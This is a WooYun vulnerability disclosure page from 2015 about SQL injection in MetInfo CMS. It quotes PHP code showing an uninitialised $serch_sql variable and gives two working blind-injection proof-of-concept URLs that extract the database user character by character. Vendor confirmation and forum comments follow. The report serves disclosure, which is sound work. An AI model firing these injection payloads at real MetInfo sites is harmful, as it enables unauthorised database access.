缺陷编号:WooYun-2015-0125648
漏洞标题:Metinfo最新版一处注入及一个小问题
相关厂商:MetInfo
漏洞作者:玉林嘎
提交时间:2015-07-09 15:24
公开时间:2015-10-10 13:10
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
Tags标签:
2015-07-09: 细节已通知厂商并且等待厂商处理中
2015-07-12: 厂商已经确认,细节仅向厂商公开
2015-07-15: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2015-09-05: 细节向核心白帽子及相关领域专家公开
2015-09-15: 细节向普通白帽子公开
2015-09-25: 细节向实习白帽子公开
2015-10-10: 细节向公众公开
rt
metinfo最新版1、注入漏洞文件:/include/global/listmod.php截取关键代码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 |
require_once substr(dirname(__FILE__), 0, -6).'common.inc.php';<br> require_once '../include/global/pseudo.php';<br> if($dbname!=$met_download&&$dbname!=$met_img&&$dbname!=$met_news&&$dbname!=$met_product){okinfo('../404.html');exit();}<br> if($class_list[$class1]['module']>=100||($class1==0&&$class2==0&&$class3==0)||$class1==10001){<br> if($search=="search"){<br> $search_module=$imgproduct=='product'?3:5;<br> if($searchtype)$search_module=$searchtype;<br> $query="select * from $met_column where module='$search_module' and (classtype=1 or releclass!=0) and lang='$lang' order by no_order ASC,id ASC";<br> $search_coloumn=$db->get_all($query);<br> $class1=$search_coloumn[0]['id'];<br> }else{<br> if($imgproduct){<br> $ipmd = $imgproduct=='product'?100:101;<br> if($imgproduct=='product'){$class1=$productlistid;}<br> else{$class1=$imglistid;}<br> }<br> }<br> }<br> else{<br> if(!$class1){<br> if(!$class2){$class2=$class_list[$class3]['bigclass'];}<br> $class1=$class_list[$class2]['bigclass'];<br> }<br> }<br> if($met_member_use){<br> $classaccess=$class3?$class3:($class2?$class2:$class1);<br> $classaccess= $db->get_one("SELECT * FROM $met_column WHERE id='$classaccess'");<br> $metaccess=$classaccess['access'];<br> }<br> require_once '../include/head.php';<br> if($class1){if(!is_array($class_list[$class1]))okinfo('../404.html');}<br> $pseudos=$db->get_one("select * from $met_column where filename='$class2' and lang='$lang'");<br> if($pseudos){<br> $class2=$pseudos[id];<br> }......$class1_info=$class_list[$class1]['releclass']?$class_list[$class_list[$class1]['releclass']]:$class_list[$class1];<br> $class2_info=$class_list[$class1]['releclass']?$class_list[$class1]:$class_list[$class2];<br> $class3_info=$class_list[$class1]['releclass']?$class_list[$class2]:$class_list[$class3];<br> if(!is_array($class1_info))okinfo('../404.html');<br> $class1sql=" class1='$class1' ";<br> if($class1&&!$class2&&!$class3){<br> foreach($module_list2[$class_list[$class1]['module']] as $key=>$val){<br> if($val['releclass']==$class1){<br> $class1re.=" or class1='$val[id]' ";<br> }<br> }<br> if($class1re){<br> $class1sql='('.$class1sql.$class1re.')';<br> }<br> }<br> if($imgproduct){<br> $ipcom = $imgproduct=='product'?$productcom:$imgcom;<br> $serch_sql .=" where lang='$lang' {$mobilesql} and (recycle='0' or recycle='-1')";<br> if($ipcom=='com')$serch_sql .= " and com_ok=1";<br> if($class1 && $class_list[$class1]['module']<>$ipmd&&$class1!=10001){<br> $serch_sql .= ' and (('.$class1sql;<br> }else{<br> $serch_sql .= ' and ((1=1';<br> }<br> }else{<br> $serch_sql=" where lang='$lang' {$mobilesql} and (recycle='0' or recycle='-1') and (( $class1sql ";<br> } |
1 2 3 4 5 6 7 8 9 10 11 12 |
if($imgproduct){<br> $ipcom = $imgproduct=='product'?$productcom:$imgcom;<br> $serch_sql .=" where lang='$lang' {$mobilesql} and (recycle='0' or recycle='-1')";<br> if($ipcom=='com')$serch_sql .= " and com_ok=1";<br> if($class1 && $class_list[$class1]['module']<>$ipmd&&$class1!=10001){<br> $serch_sql .= ' and (('.$class1sql;<br> }else{<br> $serch_sql .= ' and ((1=1';<br> }<br> }else{<br> $serch_sql=" where lang='$lang' {$mobilesql} and (recycle='0' or recycle='-1') and (( $class1sql ";<br> } |
$serch_sql之前在这段代码前 包括后面调用这个文件的文件都没声明 所以第一次声明是在下列代码 但是if语句中的 $serch_sql是 $serch_sql .= 这类形式的
1 2 3 |
if($imgproduct){<br> $ipcom = $imgproduct=='product'?$productcom:$imgcom;<br> $serch_sql .=" where lang='$lang' {$mobilesql} and (recycle='0' or recycle='-1')"; |
导致可以直接控制$serch_sql参数啦在之后
1 |
$total_count = $db->counter($dbname, "$serch_sql", "*"); |
进入查询但是前面有一些条件 所以我们需要调用这个文件才行$imgproduct需满足所以调用/img/img.php这个文件证明:我们在 赋值之后打印出来 看仔细点
可以控制**.**.**.**/metinfo/img/img.php?class1=1&serch_sql=%201=if%28ascii%28substr%28user%28%29,1,1%29%29=114,1,2%29%23
**.**.**.**/metinfo/img/img.php?class1=1&serch_sql=%201=if%28ascii%28substr%28user%28%29,1,1%29%29=115,1,2%29%23
另一个小问题/wap/module.php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 |
switch($module){<br> default:<br> $temp = 'index';<br> $waptitle=$wap_title;<br> break;<br> case 1:<br> $temp = 'show';<br> $dbname = $met_column;<br> break;<br> case 2:<br> $temp = 'news';<br> $dbname = $met_news;<br> $list_num = $wap_news_list;<br> break;<br> case 3:<br> $temp = 'product';<br> $dbname = $met_product;<br> $list_num = $wap_product_list;<br> break;<br> case 4:<br> $temp = 'download';<br> $dbname = $met_download;<br> $list_num = $wap_download_list;<br> break;<br> case 5:<br> $temp = 'img';<br> $dbname = $met_img;<br> $list_num = $wap_img_list;<br> break;<br> case 6:<br> $temp = 'job';<br> $dbname = $met_job;<br> $list_num = $wap_job_list;<br> break;<br> }<br> if($temp != 'index'){<br> $ctitle = $db->get_one("select * from $dbname where lang='$lang' and id = '$id'");<br> if(!$id){<br> $clname = $class1?'class1':($class2?'class2':'class3');<br> $classwap = $class1?$class1:($class2?$class2:$class3);<br> $qtext = $met_wap_ok?"and wap_ok='1'":'';<br> $serch_sql=" where lang='$lang' and $clname = '$classwap' $qtext";<br> if($module==6)$serch_sql=" where lang='$lang' $qtext";<br> $order_sql=$class3?list_order($class_list[$class3]['list_order']):($class2?list_order($class_list[$class2]['list_order']):list_order($class_list[$class1]['list_order']));<br> if($module==6)$order_sql='order by no_order desc,addtime desc';<br> $total_count = $db->counter($dbname, "$serch_sql", "*");<br> $totaltop_count = $db->counter($dbname, "$serch_sql and top_ok='1'", "*");<br> require_once '../include/pager.class.php';<br> $page = (int)$page;<br> if($page_input){$page=$page_input;}<br> $rowset = new Pager($total_count,$list_num,$page);<br> $from_record = $rowset->_offset();<br> $page = $page?$page:1;<br> if($module==6){<br> $query = "SELECT * FROM $dbname $serch_sql and access='0' $order_sql LIMIT $from_record, $list_num";<br> }else{<br> $query = "SELECT * FROM $dbname $serch_sql and top_ok='1' and access='0' and (recycle='0' or recycle='-1') $order_sql LIMIT $from_record, $list_num";<br> } |
$list_num参数 如果进入case 1 就可以控制
本以为 是个limit注入
在这个表中 根本没这些 字段...
过滤
危害等级:高
漏洞Rank:20
确认时间:2015-07-1213:08
是系统漏洞,后续版本修复。
暂无
牛逼
看来你已经拿到源码开始审计了啊, 今天拿到份5.2 的源码。 正准备搞呢。。
通用的速度 感动啊!
2K?
@牛肉包子 嗯
大牛 带我飞
玉总带我飞好么
@玉林嘎 带我飞⊙﹏⊙
求带飞
http://wooyun.org/bugs/wooyun-2010-0119166 跟这个一模一样的
@menmen519 我看到你那个公开之后 发现差不多的问题 就是入口不一样而已
@玉林嘎 哦 呵呵 反正2k到手 哈哈
原文连接
的情况下转载,若非则不得使用我方内容。